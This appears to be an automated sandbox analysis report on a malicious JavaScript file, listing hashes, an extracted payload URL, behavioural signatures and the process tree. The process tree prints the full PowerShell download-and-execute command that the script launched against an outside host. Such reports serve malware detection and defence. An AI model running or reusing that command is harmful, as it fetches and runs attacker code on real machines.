Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:39
Static task
static1
Behavioral task
behavioral1
Sample
adece19c122b2d32188a9518225acd46aa48546c38d1edcac1beab8b07c0d108.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
adece19c122b2d32188a9518225acd46aa48546c38d1edcac1beab8b07c0d108.js
Resource
win10v2004-20240226-en
General
-
Target
adece19c122b2d32188a9518225acd46aa48546c38d1edcac1beab8b07c0d108.js
-
Size
69KB
-
MD5
d9157cd51b372caebe639defa7fa93a2
-
SHA1
d5977d9de34ccd5f5dde67d14cb11c236063ef9c
-
SHA256
adece19c122b2d32188a9518225acd46aa48546c38d1edcac1beab8b07c0d108
-
SHA512
d6554f171d8d2ded72d23034621886fba4f2f7a176b477349f573c3a18d8ed29c4477f777821c97f87549641261d49c404ca1163f0b8ebc7168033b128e6d2bf
-
SSDEEP
1536:5dw3MCXHg6wPezOK72C8NMlpMJyZ1uLSOZGemk80iuS7pKD28itFk:w3M0twPezOC8NkyJl/ZGemk1i5YNUi
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2872 powershell.exe 4 2872 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2872 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1612 wrote to memory of 2872 1612 wscript.exe 28 PID 1612 wrote to memory of 2872 1612 wscript.exe 28 PID 1612 wrote to memory of 2872 1612 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\adece19c122b2d32188a9518225acd46aa48546c38d1edcac1beab8b07c0d108.js1⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-